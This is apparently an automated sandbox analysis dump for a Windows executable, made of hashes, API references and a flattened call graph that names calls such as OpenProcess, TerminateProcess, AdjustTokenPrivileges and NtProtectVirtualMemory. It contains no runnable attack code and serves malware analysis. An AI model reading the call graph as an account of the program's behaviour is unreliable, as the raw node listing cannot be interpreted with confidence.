                                                                                                                                                                                                                                                                                                        • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                                        • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                        • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                                                        • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 190613189-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                                        Execution Coverage:3.4%
                                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                        Signature Coverage:3.6%
                                                                                                                                                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:49
calls 102144->102146 102145 fc2e8b messages 102145->102141 102464 fce322 8 API calls messages 102145->102464 102146->102126 102146->102128 102146->102131 102146->102136 102146->102139 102146->102144 102149 1007c59 102146->102149 102146->102152 102148->102152 102153 fbbed9 8 API calls 102148->102153 102472 1023fe1 81 API calls __wsopen_s 102149->102472 102150 fc3160 9 API calls 102150->102152 102152->102138 102152->102145 102152->102150 102300 103a9ac 102152->102300 102308 103a6aa 102152->102308 102316 103ab3f 102152->102316 102338 1030fb8 102152->102338 102363 102f94a 102152->102363 102372 1039ffc 102152->102372 102375 fbbd57 102152->102375 102381 1039fe8 102152->102381 102384 102664c 102152->102384 102391 fcf950 102152->102391 102398 103ad47 102152->102398 102403 103a5b2 102152->102403 102409 fcac3e 102152->102409 102474 1023fe1 81 API calls __wsopen_s 102152->102474 102153->102152 102169 fd0150 ___std_exception_copy 102167->102169 102168 fd016a 102168->102002 102169->102168 102172 fd016c 102169->102172 102992 fd521d 7 API calls 2 library calls 102169->102992 102171 fd09dd 102994 fd3614 RaiseException 102171->102994 102172->102171 102993 fd3614 RaiseException 102172->102993 102175 fd09fa 102175->102002 102176->102002 102178 fbbefc __fread_nolock 102177->102178 102179 fbbeed 102177->102179 102178->102002 102179->102178 102180 fd017b 8 API calls 102179->102180 102180->102178 102181->102025 102182->102029 102183->102025 102184->102025 102185->102025 102205 fc0376 messages 102186->102205 102187 fd05b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 102187->102205 102188 fd0413 29 API calls pre_c_initialization 102188->102205 102189 fd014b 8 API calls 102189->102205 102190 100632b 102262 1023fe1 81 API calls __wsopen_s 102190->102262 102191 fc1695 102199 fbbed9 8 API calls 102191->102199 102203 fc049d messages 102191->102203 102192 fc1e50 40 API calls 102192->102205 102194 100625a 102261 1023fe1 81 API calls 
__wsopen_s 102194->102261 102195 fbbed9 8 API calls 102195->102205 102196 1005cdb 102201 fbbed9 8 API calls 102196->102201 102196->102203 102199->102203 102200 fc1990 224 API calls 102200->102205 102201->102203 102202 fbbf73 8 API calls 102202->102205 102203->102052 102204 fc0aae messages 102260 1023fe1 81 API calls __wsopen_s 102204->102260 102205->102187 102205->102188 102205->102189 102205->102190 102205->102191 102205->102192 102205->102194 102205->102195 102205->102196 102205->102200 102205->102202 102205->102203 102205->102204 102206 1006115 102205->102206 102207 fd0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 102205->102207 102259 1023fe1 81 API calls __wsopen_s 102206->102259 102207->102205 102209->102082 102210->102092 102211->102080 102212->102094 102213->102090 102214->102037 102215->102094 102216->102092 102217->102094 102219 1006bed 102218->102219 102220 1036101 102218->102220 102219->102063 102219->102074 102263 fd017b 102220->102263 102222 fd014b 8 API calls 102223 1036123 102222->102223 102223->102219 102223->102222 102272 1021400 8 API calls 102223->102272 102226 1006c32 102225->102226 102227 1021499 102225->102227 102226->102088 102227->102226 102228 fd014b 8 API calls 102227->102228 102228->102226 102229->102079 102230->102086 102231->102066 102233 fb8ed2 102232->102233 102234 fb8ed5 102232->102234 102233->102084 102235 fb8f0b 102234->102235 102236 fb8edd 102234->102236 102238 ff6b1f 102235->102238 102239 fb8f1d 102235->102239 102246 ff6a38 102235->102246 102276 fd5536 26 API calls 102236->102276 102285 fd54f3 26 API calls 102238->102285 102283 fcfe6f 51 API calls 102239->102283 102240 fb8eed 102245 fd014b 8 API calls 102240->102245 102243 ff6b37 102243->102243 102247 fb8ef7 102245->102247 102248 ff6ab1 102246->102248 102250 fd017b 8 API calls 102246->102250 102277 fbb329 102247->102277 102284 fcfe6f 51 API calls 102248->102284 102252 ff6a81 102250->102252 102251 fd014b 8 API calls 102253 ff6aa8 
102251->102253 102252->102251 102254 fbb329 8 API calls 102253->102254 102254->102248 102255->102059 102256->102072 102257->102065 102258->102092 102259->102204 102260->102203 102261->102203 102262->102203 102264 fd014b ___std_exception_copy 102263->102264 102265 fd016a 102264->102265 102268 fd016c 102264->102268 102273 fd521d 7 API calls 2 library calls 102264->102273 102265->102223 102267 fd09dd 102275 fd3614 RaiseException 102267->102275 102268->102267 102274 fd3614 RaiseException 102268->102274 102271 fd09fa 102271->102223 102272->102223 102273->102264 102274->102267 102275->102271 102276->102240 102278 fbb338 _wcslen 102277->102278 102279 fd017b 8 API calls 102278->102279 102280 fbb360 __fread_nolock 102279->102280 102281 fd014b 8 API calls 102280->102281 102282 fbb376 102281->102282 102282->102233 102283->102240 102284->102238 102285->102243 102286->102104 102287->102096 102288->102097 102289->102097 102291 fc31a1 102290->102291 102292 fc317d 102290->102292 102475 fd05b2 5 API calls __Init_thread_wait 102291->102475 102293 fc2bb0 102292->102293 102477 fd05b2 5 API calls __Init_thread_wait 102292->102477 102293->102117 102296 fc31ab 102296->102292 102476 fd0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102296->102476 102297 fc9f47 102297->102293 102478 fd0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102297->102478 102301 103aa08 102300->102301 102307 103a9c8 102300->102307 102302 103aa26 102301->102302 102511 fbc98d 102301->102511 102304 fbc98d 39 API calls 102302->102304 102305 103aa8e 102302->102305 102302->102307 102304->102305 102479 1020372 102305->102479 102307->102152 102310 103a705 102308->102310 102315 103a6c5 102308->102315 102309 103a723 102311 fbc98d 39 API calls 102309->102311 102313 103a780 102309->102313 102309->102315 102310->102309 102312 fbc98d 39 API calls 102310->102312 102311->102313 102312->102309 102314 1020372 58 API calls 102313->102314 102314->102315 102315->102152 102317 fb8ec0 52 API calls 
102316->102317 102318 103ab62 102317->102318 102556 101dd87 CreateToolhelp32Snapshot Process32FirstW 102318->102556 102320 103ab73 102321 103abc3 OpenProcess 102320->102321 102327 103ab78 102320->102327 102322 103acc2 TerminateProcess 102321->102322 102323 103abdd GetLastError 102321->102323 102324 103ad20 CloseHandle 102322->102324 102325 103accf GetLastError 102322->102325 102326 103abec 102323->102326 102332 103ac72 102323->102332 102324->102327 102333 103ace3 102325->102333 102566 101d715 12 API calls 102326->102566 102327->102152 102329 103abfa 102567 1012010 11 API calls messages 102329->102567 102331 103ac04 102334 103ac08 OpenProcess 102331->102334 102335 103ac1a 102331->102335 102332->102322 102332->102327 102333->102324 102334->102335 102568 1011a0b AdjustTokenPrivileges CloseHandle messages 102335->102568 102337 103ac70 102337->102332 102339 1030fe1 102338->102339 102340 103100f WSAStartup 102339->102340 102342 fbc98d 39 API calls 102339->102342 102341 1031054 102340->102341 102362 1031023 messages 102340->102362 102690 fcc1f6 102341->102690 102344 1030ffc 102342->102344 102344->102340 102347 fbc98d 39 API calls 102344->102347 102346 fb8ec0 52 API calls 102348 1031069 102346->102348 102349 103100b 102347->102349 102695 fcf9d4 WideCharToMultiByte 102348->102695 102349->102340 102351 1031075 inet_addr gethostbyname 102352 1031093 IcmpCreateFile 102351->102352 102351->102362 102353 10310d3 102352->102353 102352->102362 102354 fd017b 8 API calls 102353->102354 102355 10310ec 102354->102355 102703 fb423c 102355->102703 102358 1031102 IcmpSendEcho 102361 103114c 102358->102361 102359 103112b IcmpSendEcho 102359->102361 102360 1031212 IcmpCloseHandle WSACleanup 102360->102362 102361->102360 102362->102152 102364 fd017b 8 API calls 102363->102364 102365 102f95b 102364->102365 102366 fb423c 8 API calls 102365->102366 102367 102f965 102366->102367 102368 fb8ec0 52 API calls 102367->102368 102369 102f97c GetEnvironmentVariableW 102368->102369 102708 102160f 8 API 
calls 102369->102708 102371 102f999 messages 102371->102152 102709 10389b6 102372->102709 102374 103a00c 102374->102152 102376 fbbd71 102375->102376 102377 fbbd64 102375->102377 102378 fd014b 8 API calls 102376->102378 102377->102152 102379 fbbd7b 102378->102379 102380 fd017b 8 API calls 102379->102380 102380->102377 102382 10389b6 119 API calls 102381->102382 102383 1039ff8 102382->102383 102383->102152 102385 fb8ec0 52 API calls 102384->102385 102386 1026662 102385->102386 102822 101dc54 102386->102822 102388 102666a 102389 102666e GetLastError 102388->102389 102390 1026683 102388->102390 102389->102390 102390->102152 102392 fbc98d 39 API calls 102391->102392 102393 fcf964 102392->102393 102394 100fb20 Sleep 102393->102394 102395 fcf96c timeGetTime 102393->102395 102396 fbc98d 39 API calls 102395->102396 102397 fcf982 102396->102397 102397->102152 102399 fb8ec0 52 API calls 102398->102399 102400 103ad63 102399->102400 102401 101dd87 46 API calls 102400->102401 102402 103ad72 102401->102402 102402->102152 102405 103a5c5 102403->102405 102404 fb8ec0 52 API calls 102406 103a632 102404->102406 102405->102404 102408 103a5d4 102405->102408 102883 10218a9 102406->102883 102408->102152 102410 fb8ec0 52 API calls 102409->102410 102411 fcac68 102410->102411 102924 fcbc58 102411->102924 102413 fcac7f 102414 fbc98d 39 API calls 102413->102414 102416 fcb09b _wcslen 102413->102416 102414->102416 102415 fd4d98 _strftime 40 API calls 102415->102416 102416->102415 102417 fcbbbe 43 API calls 102416->102417 102419 fb6c03 8 API calls 102416->102419 102422 fcb1fb 102416->102422 102423 fb8ec0 52 API calls 102416->102423 102424 fbc98d 39 API calls 102416->102424 102425 fb8577 8 API calls 102416->102425 102929 fb396b 102416->102929 102939 fb3907 102416->102939 102943 fb7ad5 102416->102943 102948 fbad40 8 API calls __fread_nolock 102416->102948 102949 fb7b1a 8 API calls 102416->102949 102417->102416 102419->102416 102422->102152 102423->102416 102424->102416 102425->102416 102429 1037b52 
102428->102429 102430 1037b38 102428->102430 102432 10360e6 8 API calls 102429->102432 102987 1023fe1 81 API calls __wsopen_s 102430->102987 102433 1037b5d 102432->102433 102434 fc0340 223 API calls 102433->102434 102435 1037bc1 102434->102435 102436 1037c5c 102435->102436 102440 1037c03 102435->102440 102463 1037b4a 102435->102463 102437 1037c62 102436->102437 102438 1037cb0 102436->102438 102988 1021ad8 8 API calls 102437->102988 102439 fb8ec0 52 API calls 102438->102439 102438->102463 102441 1037cc2 102439->102441 102445 102148b 8 API calls 102440->102445 102443 fbc2c9 8 API calls 102441->102443 102446 1037ce6 CharUpperBuffW 102443->102446 102444 1037c85 102989 fbbd07 8 API calls 102444->102989 102448 1037c3b 102445->102448 102450 1037d00 102446->102450 102449 fc2b20 223 API calls 102448->102449 102449->102463 102451 1037d53 102450->102451 102452 1037d07 102450->102452 102453 fb8ec0 52 API calls 102451->102453 102456 102148b 8 API calls 102452->102456 102454 1037d5b 102453->102454 102990 fcaa65 9 API calls 102454->102990 102457 1037d35 102456->102457 102458 fc2b20 223 API calls 102457->102458 102458->102463 102459 1037d65 102460 fb8ec0 52 API calls 102459->102460 102459->102463 102461 1037d80 102460->102461 102991 fbbd07 8 API calls 102461->102991 102463->102113 102464->102145 102465->102114 102466->102118 102467->102126 102468->102138 102469->102138 102470->102152 102471->102152 102472->102152 102473->102148 102474->102152 102475->102296 102476->102292 102477->102297 102478->102293 102516 10202aa 102479->102516 102482 10203f3 102532 10205e9 56 API calls __fread_nolock 102482->102532 102483 102040b 102484 1020471 102483->102484 102486 102041b 102483->102486 102487 10204a1 102484->102487 102488 1020507 102484->102488 102499 1020399 __fread_nolock 102484->102499 102510 1020453 102486->102510 102533 1022855 10 API calls 102486->102533 102489 10204d1 102487->102489 102490 10204a6 102487->102490 102491 10205b0 102488->102491 102492 1020510 102488->102492 
102489->102499 102537 fbca5b 39 API calls 102489->102537 102490->102499 102536 fbca5b 39 API calls 102490->102536 102491->102499 102541 fbc63f 39 API calls 102491->102541 102493 1020515 102492->102493 102497 102058d 102492->102497 102500 102051b 102493->102500 102501 1020554 102493->102501 102497->102499 102540 fbc63f 39 API calls 102497->102540 102499->102307 102500->102499 102538 fbc63f 39 API calls 102500->102538 102501->102499 102539 fbc63f 39 API calls 102501->102539 102506 1020427 102534 1022855 10 API calls 102506->102534 102508 102043e __fread_nolock 102535 1022855 10 API calls 102508->102535 102523 1021844 102510->102523 102512 fbc99e 102511->102512 102513 fbc9a5 102511->102513 102512->102513 102555 fd6641 39 API calls _strftime 102512->102555 102513->102302 102515 fbc9e8 102515->102302 102517 10202f7 102516->102517 102521 10202bb 102516->102521 102518 fbc98d 39 API calls 102517->102518 102519 10202f5 102518->102519 102519->102482 102519->102483 102519->102499 102520 fb8ec0 52 API calls 102520->102521 102521->102519 102521->102520 102542 fd4d98 102521->102542 102524 102184f 102523->102524 102525 fd014b 8 API calls 102524->102525 102526 1021856 102525->102526 102527 1021862 102526->102527 102528 1021883 102526->102528 102529 fd017b 8 API calls 102527->102529 102530 fd017b 8 API calls 102528->102530 102531 102186b ___scrt_fastfail 102529->102531 102530->102531 102531->102499 102532->102499 102533->102506 102534->102508 102535->102510 102536->102499 102537->102499 102538->102499 102539->102499 102540->102499 102541->102499 102543 fd4e1b 102542->102543 102544 fd4da6 102542->102544 102554 fd4e2d 40 API calls 4 library calls 102543->102554 102551 fd4dcb 102544->102551 102552 fdf649 20 API calls __dosmaperr 102544->102552 102547 fd4e28 102547->102521 102548 fd4db2 102553 fe2b5c 26 API calls ___std_exception_copy 102548->102553 102550 fd4dbd 102550->102521 102551->102521 102552->102548 102553->102550 102554->102547 102555->102515 102569 101e80e 102556->102569 
102558 101ddd4 Process32NextW 102559 101de86 CloseHandle 102558->102559 102565 101ddcd 102558->102565 102559->102320 102560 fbbf73 8 API calls 102560->102565 102561 fbb329 8 API calls 102561->102565 102565->102558 102565->102559 102565->102560 102565->102561 102575 fb568e 102565->102575 102617 fb7bb5 102565->102617 102626 fce36b 41 API calls 102565->102626 102566->102329 102567->102331 102568->102337 102570 101e819 102569->102570 102571 101e830 102570->102571 102574 101e836 102570->102574 102627 fd6722 GetStringTypeW _strftime 102570->102627 102628 fd666b 39 API calls _strftime 102571->102628 102574->102565 102629 fbbf73 102575->102629 102578 fbbf73 8 API calls 102579 fb56ac 102578->102579 102580 fbbf73 8 API calls 102579->102580 102581 fb56b4 102580->102581 102582 fbbf73 8 API calls 102581->102582 102583 fb56bc 102582->102583 102584 fb56f0 102583->102584 102585 ff4da1 102583->102585 102587 fbacc0 8 API calls 102584->102587 102586 fbbed9 8 API calls 102585->102586 102588 ff4daa 102586->102588 102589 fb56fe 102587->102589 102590 fbbd57 8 API calls 102588->102590 102646 fbadf4 102589->102646 102593 fb5733 102590->102593 102592 fb5708 102592->102593 102594 fbacc0 8 API calls 102592->102594 102595 fb5754 102593->102595 102609 fb5778 102593->102609 102616 ff4dcc 102593->102616 102597 fb5729 102594->102597 102595->102609 102650 fb655e 102595->102650 102599 fbadf4 8 API calls 102597->102599 102598 fb5789 102600 fb579f 102598->102600 102604 fbbed9 8 API calls 102598->102604 102599->102593 102605 fbbed9 8 API calls 102600->102605 102607 fb57b3 102600->102607 102604->102600 102605->102607 102606 fb57be 102611 fbbed9 8 API calls 102606->102611 102614 fb57c9 102606->102614 102607->102606 102610 fbbed9 8 API calls 102607->102610 102608 fbacc0 8 API calls 102608->102609 102634 fbacc0 102609->102634 102610->102606 102611->102614 102612 fb655e 8 API calls 102613 ff4e8c 102612->102613 102613->102609 102613->102612 102665 fbad40 8 API calls __fread_nolock 102613->102665 
102614->102565 102653 fb8577 102616->102653 102618 ff641d 102617->102618 102619 fb7bc7 102617->102619 102684 10113c8 8 API calls __fread_nolock 102618->102684 102674 fb7bd8 102619->102674 102622 fb7bd3 102622->102565 102623 ff6427 102624 ff6433 102623->102624 102625 fbbed9 8 API calls 102623->102625 102625->102624 102626->102565 102627->102570 102628->102574 102630 fd017b 8 API calls 102629->102630 102631 fbbf88 102630->102631 102632 fd014b 8 API calls 102631->102632 102633 fb56a4 102632->102633 102633->102578 102637 fbace1 102634->102637 102645 fbaccf 102634->102645 102635 fbacda __fread_nolock 102635->102598 102639 1000557 102637->102639 102640 fbad07 102637->102640 102637->102645 102638 10005a3 __fread_nolock 102642 fd014b 8 API calls 102639->102642 102666 fb88e8 8 API calls 102640->102666 102643 1000561 102642->102643 102644 fd017b 8 API calls 102643->102644 102644->102645 102645->102635 102667 fbc2c9 102645->102667 102647 fbae02 102646->102647 102649 fbae0b __fread_nolock 102646->102649 102648 fbc2c9 8 API calls 102647->102648 102647->102649 102648->102649 102649->102592 102651 fbc2c9 8 API calls 102650->102651 102652 fb5761 102651->102652 102652->102608 102652->102609 102654 fb8587 _wcslen 102653->102654 102655 ff6610 102653->102655 102658 fb859d 102654->102658 102659 fb85c2 102654->102659 102656 fbadf4 8 API calls 102655->102656 102657 ff6619 102656->102657 102657->102657 102673 fb88e8 8 API calls 102658->102673 102660 fd014b 8 API calls 102659->102660 102662 fb85ce 102660->102662 102663 fd017b 8 API calls 102662->102663 102664 fb85a5 __fread_nolock 102663->102664 102664->102613 102665->102613 102666->102635 102668 fbc2d9 __fread_nolock 102667->102668 102669 fbc2dc 102667->102669 102668->102638 102670 fd014b 8 API calls 102669->102670 102671 fbc2e7 102670->102671 102672 fd017b 8 API calls 102671->102672 102672->102668 102673->102664 102676 fb7be7 102674->102676 102681 fb7c1b __fread_nolock 102674->102681 102675 ff644e 102678 fd014b 8 API calls 102675->102678 
102676->102675 102677 fb7c0e 102676->102677 102676->102681 102685 fb7d74 102677->102685 102680 ff645d 102678->102680 102682 fd017b 8 API calls 102680->102682 102681->102622 102683 ff6491 __fread_nolock 102682->102683 102684->102623 102686 fb7d8a 102685->102686 102689 fb7d85 __fread_nolock 102685->102689 102687 fd017b 8 API calls 102686->102687 102688 ff6528 102686->102688 102687->102689 102689->102681 102691 fd017b 8 API calls 102690->102691 102692 fcc209 102691->102692 102693 fd014b 8 API calls 102692->102693 102694 fcc215 102693->102694 102694->102346 102696 fcf9fe 102695->102696 102697 fcfa35 102695->102697 102699 fd017b 8 API calls 102696->102699 102707 fcfe8a 8 API calls 102697->102707 102701 fcfa05 WideCharToMultiByte 102699->102701 102700 fcfa29 102700->102351 102706 fcfa3e 8 API calls __fread_nolock 102701->102706 102704 fd014b 8 API calls 102703->102704 102705 fb424e 102704->102705 102705->102358 102705->102359 102706->102700 102707->102700 102708->102371 102710 fb8ec0 52 API calls 102709->102710 102711 10389ed 102710->102711 102734 1038a32 messages 102711->102734 102747 1039730 102711->102747 102713 1038cde 102714 1038eac 102713->102714 102719 1038cec 102713->102719 102797 1039941 59 API calls 102714->102797 102717 1038ebb 102718 1038ec7 102717->102718 102717->102719 102718->102734 102760 10388e3 102719->102760 102720 fb8ec0 52 API calls 102738 1038aa6 102720->102738 102725 1038d25 102774 fcffe0 102725->102774 102728 1038d45 102781 1023fe1 81 API calls __wsopen_s 102728->102781 102729 1038d5f 102782 fb7e12 102729->102782 102732 1038d50 GetCurrentProcess TerminateProcess 102732->102729 102734->102374 102738->102713 102738->102720 102738->102734 102779 1014ad3 8 API calls __fread_nolock 102738->102779 102780 1038f7a 41 API calls _strftime 102738->102780 102739 1038f22 102739->102734 102743 1038f36 FreeLibrary 102739->102743 102740 1038d9e 102794 10395d8 74 API calls 102740->102794 102743->102734 102745 1038daf 102745->102739 102795 fc1ca0 8 API calls 
102745->102795 102796 fbb4c8 8 API calls 102745->102796 102798 10395d8 74 API calls 102745->102798 102748 fbc2c9 8 API calls 102747->102748 102749 103974b CharLowerBuffW 102748->102749 102799 1019805 102749->102799 102753 fbbf73 8 API calls 102754 1039787 102753->102754 102755 fbacc0 8 API calls 102754->102755 102756 103979b 102755->102756 102757 fbadf4 8 API calls 102756->102757 102759 10397a5 _wcslen 102757->102759 102758 10398bb _wcslen 102758->102738 102759->102758 102806 1038f7a 41 API calls _strftime 102759->102806 102761 1038949 102760->102761 102762 10388fe 102760->102762 102766 1039af3 102761->102766 102763 fd017b 8 API calls 102762->102763 102764 1038920 102763->102764 102764->102761 102765 fd014b 8 API calls 102764->102765 102765->102764 102767 1039d08 messages 102766->102767 102772 1039b17 _strcat _wcslen ___std_exception_copy 102766->102772 102767->102725 102768 fbca5b 39 API calls 102768->102772 102769 fbc98d 39 API calls 102769->102772 102770 fbc63f 39 API calls 102770->102772 102771 fb8ec0 52 API calls 102771->102772 102772->102767 102772->102768 102772->102769 102772->102770 102772->102771 102809 101f8c5 10 API calls _wcslen 102772->102809 102777 fcfff5 102774->102777 102775 fd008d NtProtectVirtualMemory 102776 fd005b 102775->102776 102776->102728 102776->102729 102777->102775 102777->102776 102778 fd007b CloseHandle 102777->102778 102778->102776 102779->102738 102780->102738 102781->102732 102783 fb7e1a 102782->102783 102784 fd014b 8 API calls 102783->102784 102785 fb7e28 102784->102785 102810 fb8445 102785->102810 102788 fb8470 102813 fbc760 102788->102813 102790 fb8480 102791 fd017b 8 API calls 102790->102791 102792 fb851c 102790->102792 102791->102792 102792->102745 102793 fc1ca0 8 API calls 102792->102793 102793->102740 102794->102745 102795->102745 102796->102745 102797->102717 102798->102745 102800 1019825 _wcslen 102799->102800 102801 1019914 102800->102801 102804 101985a 102800->102804 102805 1019919 102800->102805 102801->102753 
102801->102759 102804->102801 102807 fce36b 41 API calls 102804->102807 102805->102801 102808 fce36b 41 API calls 102805->102808 102806->102758 102807->102804 102808->102805 102809->102772 102811 fd014b 8 API calls 102810->102811 102812 fb7e30 102811->102812 102812->102788 102814 fbc76b 102813->102814 102815 1001285 102814->102815 102820 fbc773 messages 102814->102820 102816 fd014b 8 API calls 102815->102816 102817 1001291 102816->102817 102818 fbc77a 102818->102790 102820->102818 102821 fbc7e0 8 API calls messages 102820->102821 102821->102820 102823 fbbf73 8 API calls 102822->102823 102824 101dc73 102823->102824 102825 fbbf73 8 API calls 102824->102825 102826 101dc7c 102825->102826 102827 fbbf73 8 API calls 102826->102827 102828 101dc85 102827->102828 102846 fb5851 102828->102846 102833 101dcab 102835 fb568e 8 API calls 102833->102835 102834 fb6b7c 8 API calls 102834->102833 102836 101dcbf FindFirstFileW 102835->102836 102837 101dd4b FindClose 102836->102837 102839 101dcde 102836->102839 102842 101dd56 102837->102842 102838 101dd26 FindNextFileW 102838->102839 102839->102837 102839->102838 102840 fbbed9 8 API calls 102839->102840 102841 fb7bb5 8 API calls 102839->102841 102858 fb6b7c 102839->102858 102840->102839 102841->102839 102842->102388 102845 101dd42 FindClose 102845->102842 102867 ff22d0 102846->102867 102849 fb5898 102852 fbbd57 8 API calls 102849->102852 102850 fb587d 102851 fb8577 8 API calls 102850->102851 102853 fb5889 102851->102853 102852->102853 102869 fb55dc 102853->102869 102856 101eab0 GetFileAttributesW 102857 101dc99 102856->102857 102857->102833 102857->102834 102859 ff57fe 102858->102859 102860 fb6b93 102858->102860 102862 fd014b 8 API calls 102859->102862 102873 fb6ba4 102860->102873 102864 ff5808 _wcslen 102862->102864 102863 fb6b9e DeleteFileW 102863->102838 102863->102845 102865 fd017b 8 API calls 102864->102865 102866 ff5841 __fread_nolock 102865->102866 102868 fb585e GetFullPathNameW 102867->102868 102868->102849 102868->102850 102870 
fb55ea 102869->102870 102871 fbadf4 8 API calls 102870->102871 102872 fb55fe 102871->102872 102872->102856 102874 fb6bb4 _wcslen 102873->102874 102875 fb6bc7 102874->102875 102876 ff5860 102874->102876 102877 fb7d74 8 API calls 102875->102877 102878 fd014b 8 API calls 102876->102878 102879 fb6bd4 __fread_nolock 102877->102879 102880 ff586a 102878->102880 102879->102863 102881 fd017b 8 API calls 102880->102881 102882 ff589a __fread_nolock 102881->102882 102884 10218b6 102883->102884 102885 fd014b 8 API calls 102884->102885 102886 10218bd 102885->102886 102889 101fcb5 102886->102889 102888 10218f7 102888->102408 102890 fbc2c9 8 API calls 102889->102890 102891 101fcc8 CharLowerBuffW 102890->102891 102893 101fcdb 102891->102893 102892 fb655e 8 API calls 102892->102893 102893->102892 102894 101fce5 ___scrt_fastfail 102893->102894 102895 101fd19 102893->102895 102894->102888 102896 fb655e 8 API calls 102895->102896 102898 101fd2b 102895->102898 102896->102898 102897 fd017b 8 API calls 102902 101fd59 102897->102902 102898->102897 102901 101fdb8 102901->102894 102904 fd014b 8 API calls 102901->102904 102903 101fd7b 102902->102903 102922 101fbed 8 API calls 102902->102922 102907 101fe0c 102903->102907 102905 101fdd2 102904->102905 102906 fd017b 8 API calls 102905->102906 102906->102894 102908 fbbf73 8 API calls 102907->102908 102909 101fe3e 102908->102909 102910 fbbf73 8 API calls 102909->102910 102911 101fe47 102910->102911 102912 fbbf73 8 API calls 102911->102912 102917 101fe50 102912->102917 102913 1020114 102913->102901 102914 fbad40 8 API calls 102914->102917 102915 fb8577 8 API calls 102915->102917 102916 fd66f8 GetStringTypeW 102916->102917 102917->102913 102917->102914 102917->102915 102917->102916 102919 fd6641 39 API calls 102917->102919 102920 101fe0c 40 API calls 102917->102920 102921 fbbed9 8 API calls 102917->102921 102923 fd6722 GetStringTypeW _strftime 102917->102923 102919->102917 102920->102917 102921->102917 102922->102902 102923->102917 102925 fd014b 8 
__dosmaperr 104837->104894 104838->104837 104840 ff0454 104838->104840 104847 ff09db 104840->104847 104841 ff0420 104895 fe2b5c 26 API calls ___std_exception_copy 104841->104895 104846 ff042a __fread_nolock 104846->104830 104897 ff07af 104847->104897 104850 ff0a0d 104929 fdf636 20 API calls __dosmaperr 104850->104929 104851 ff0a26 104915 fe5594 104851->104915 104854 ff0a2b 104856 ff0a4b 104854->104856 104857 ff0a34 104854->104857 104855 ff0a12 104930 fdf649 20 API calls __dosmaperr 104855->104930 104928 ff071a CreateFileW 104856->104928 104931 fdf636 20 API calls __dosmaperr 104857->104931 104861 ff0a39 104932 fdf649 20 API calls __dosmaperr 104861->104932 104863 ff0b01 GetFileType 104864 ff0b0c GetLastError 104863->104864 104865 ff0b53 104863->104865 104935 fdf613 20 API calls 2 library calls 104864->104935 104937 fe54dd 21 API calls 3 library calls 104865->104937 104866 ff0ad6 GetLastError 104934 fdf613 20 API calls 2 library calls 104866->104934 104869 ff0a84 104869->104863 104869->104866 104933 ff071a CreateFileW 104869->104933 104870 ff0b1a CloseHandle 104870->104855 104872 ff0b43 104870->104872 104936 fdf649 20 API calls __dosmaperr 104872->104936 104874 ff0ac9 104874->104863 104874->104866 104876 ff0b74 104877 ff0bc0 104876->104877 104938 ff092b 72 API calls 4 library calls 104876->104938 104882 ff0bed 104877->104882 104939 ff04cd 72 API calls 4 library calls 104877->104939 104878 ff0b48 104878->104855 104881 ff0be6 104881->104882 104883 ff0bfe 104881->104883 104940 fe8a2e 104882->104940 104885 ff0478 104883->104885 104886 ff0c7c CloseHandle 104883->104886 104896 ff04a1 LeaveCriticalSection __wsopen_s 104885->104896 104955 ff071a CreateFileW 104886->104955 104888 ff0ca7 104889 ff0cdd 104888->104889 104890 ff0cb1 GetLastError 104888->104890 104889->104885 104956 fdf613 20 API calls 2 library calls 104890->104956 104892 ff0cbd 104957 fe56a6 21 API calls 3 library calls 104892->104957 104894->104841 104895->104846 104896->104846 104898 ff07ea 104897->104898 
